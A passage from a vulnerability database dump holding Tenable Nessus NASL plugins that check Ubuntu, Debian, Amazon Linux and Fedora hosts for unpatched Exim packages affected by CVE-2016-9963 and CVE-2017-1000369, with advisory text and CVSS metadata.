get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n 
);\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:57:08", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer agent, may leak the private DKIM signing key to the log files if specific configuration options are met.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DSA-3747-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3747.NASL", "href": "https://www.tenable.com/plugins/nessus/96104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3747. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96104);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"DSA\", value:\"3747\");\n\n script_name(english:\"Debian DSA-3747-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:09", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer agent, may leak the private DKIM signing key to the log files if specific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DLA-762-1 : exim4 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-762.NASL", "href": "https://www.tenable.com/plugins/nessus/96097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-762-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96097);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"Debian DLA-762-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:31", "description": "It was found that Exim leaked DKIM signing private keys to the 'mainlog' log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2017-804)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-804.NASL", "href": "https://www.tenable.com/plugins/nessus/97556", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97556);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"ALAS\", value:\"2017-804\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-804)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. 
As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-804.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif 
(isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.88-2.11.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:37", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail transport agent. 
This is not a security vulnerability in Exim by itself, but can be used to exploit a vulnerability in stack handling.\nFor the full details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Debian DSA-3888-1 : exim4 - security update (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3888.NASL", "href": "https://www.tenable.com/plugins/nessus/100879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3888. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100879);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"DSA\", value:\"3888\");\n\n script_name(english:\"Debian DSA-3888-1 : exim4 - security update (Stack Clash)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. 
This is not a security vulnerability in Exim by\nitself, but can be used to exploit a vulnerability in stack handling.\nFor the full details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3888\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u1\")) flag++;\nif 
(deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:59:02", "description": "This is an update fixing multiple memory leaks and other problems.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-01T00:00:00", "type": "nessus", "title": "Fedora 26 : exim (2017-f5177f3a16) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F5177F3A16.NASL", "href": "https://www.tenable.com/plugins/nessus/102902", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-f5177f3a16.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102902);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"FEDORA\", value:\"2017-f5177f3a16\");\n\n script_name(english:\"Fedora 26 : exim (2017-f5177f3a16) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing multiple memory leaks and other problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f5177f3a16\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n 